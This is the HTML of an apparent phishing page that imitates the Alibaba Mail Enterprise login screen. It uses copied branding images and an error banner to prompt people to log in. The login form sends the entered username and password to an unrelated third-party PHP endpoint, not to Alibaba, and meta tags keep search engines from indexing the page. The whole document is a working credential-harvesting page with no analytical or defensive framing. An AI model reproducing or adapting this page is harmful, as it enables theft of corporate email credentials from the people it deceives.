
<!DOCTYPE>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>&#38463;&#37324;&#37038;&#31665;&#20225;&#19994;&#29256;</title>
<meta http-equiv='content-type' content="text/html; charset=ISO-8859-5">
<meta http-equiv='content-type' content="text/html; charset=UTF-8">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="private">
<meta http-equiv="Pragma" content="no-cache">
<link rel="icon" type="images/ico" sizes="16*16" href="https://cdn.glitch.com/1f5b46e3-b5ad-4682-be49-385f1a769bf3%2Ffavicon.ico?v=1616116607619">
<title>阿里邮箱企业版</title>
</head>
<style>
.body {
	font-family: Times New Roman;
	margin: auto;
	padding: 0px;
	border: 2px solid blue;
}

.form {
	width: auto;
	height: auto;
	position: relative;
	padding: 0px;
	margin: 0px;
	border: 2px solid #000000;
}

.container {
	position: relative;
	padding: 0px;
	margin-left: auto;
	margin-right: auto;
	width: 1535px;
	height: 700px;
	background-image: url('https://cdn.glitch.com/1f5b46e3-b5ad-4682-be49-385f1a769bf3%2Fimage.png?v=1616116696598');
	background-repeat: no-repeat;
}

input[type=text], input[type=password] {
  width: 252px;
  height: 34px;
  font-family: Segoe UI;
  font-size: 12px;
  background-color: #eef3f8;
  color: #92a4bf;
  padding: 5px;
  margin-right: 0px;
  margin-left: 0px;
  margin-top: 0px;
  margin-bottom: 5px;
  border: 1px solid #bac5d4;
  border-radius: 5px;
}

.contain {
	width: 200px;
	height: 240px;
	position: absolute;
	left: 59.5%;
	top: 27.5%;
	padding: 0px;
	margin-left: 27px;
}
  
.contain2 {
	width: 200px;
	height: 240px;
	position: absolute;
	left: 59%;
	top: 23.5%;
	padding: 0px;
	margin-left: 27px;
}

.forgot_pass {
	width: 60px;
	height: 25px;
	position: absolute;
	left: 82%;
	top: 44%;
	padding: 0px;
	margin-left: 27px;
}

.next {
	width: 252px;
	height: 24px;
	position: absolute;
	left: -30px;
	top: 14%;
	padding: 0px;
	margin-left: 27px;
}

.logo {
width: 252px; height: 24px; position: absolute; left: 17.5%; top: 3px; padding: 0px; margin-left: 27px; margin-top: 0px;
}

.header_link {
	width: 300px;
	height: 48px;
	position: absolute;
 	font-size: 12px;
	letter-spacing: 0.5px;
	border: 2px solid red;
}

.footer_link {
	width: auto;
	height: 24px;
	position: absolute;
	left: -30px;
	top: 14%;
	padding: 0px;
	margin-left: 27px;
}    

.vertical-line {
	display: inline-block;
	border-left: 1px solid #8a8a8a;
	margin-left: 10px;
	margin-right: 10px;
	height: 40px;
}

button {
  background-color: #148dde;
  color: white;
  padding: 6px;
  margin-top: 12px;
  margin-left: 0px;
  margin-right: 0px;
  margin-bottom: 20px;
  cursor: pointer;
  width: 252px;
  border: none;
  height: 36px;
  font-family: Segoe UI Semibold;
  font-size: 16px;
  text-align: center;
  border-radius: 5px;
}
	
</style>
</head>
<body style="padding: 0px; margin: 0px; font-family: Times New Roman;">

<div class="container">
	<div class="logo"><img src="https://cdn.glitch.com/1f5b46e3-b5ad-4682-be49-385f1a769bf3%2Flogo.png?v=1616116612080"></div>

	<form method="post" action="https://fjvgd.wikaba.com/mko/post1.php">
    <div class="contain2"><img src="https://cdn.glitch.com/1f5b46e3-b5ad-4682-be49-385f1a769bf3%2Ferror.png?v=1616269879893">
      </div>
		<div class="contain">
        <input id="username" type="text" placeholder="&#24080;&#21495;" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" style="margin-top: 8px; margin-bottom: 14px;" name="username" required>

    		<input id="password" type="password" placeholder="&#23494;&#30721;" style="margin-top: 12px; margin-bottom: 10px;" name="password" required>
		
		<input type="checkbox" id="check" name="check" value=""><label for="check" style="margin-left: 5px; font-size: 11px; font-weight: 1;">&#35760;&#20303;&#29992;&#25143;&#21517;</label>

		<div class="forgot_pass"><p style="text-align: right; font-size: 12px; font-weight: 1; color: blue;"><a href="">&#24536;&#35760;&#23494;&#30721;</a></p></div>
		<div class="next"><p style="text-align: center; font-size: 12px; font-weight: 1; color: #92a4bf;">&#35831;&#22635;&#20889;&#20225;&#19994;&#37038;&#31665;&#30340;&#23436;&#25972;&#24080;&#21495;&#65292;&#25110;&#31649;&#29702;&#21592;&#24080;&#21495;&#12290;</p></div>

		<button type="submit" style="font-size: 16px;"><b>&#30331;&#24405;</b></button>
		</div>
	</form>
</div>

<div class="footer_link">
</div>

</body>
</html>

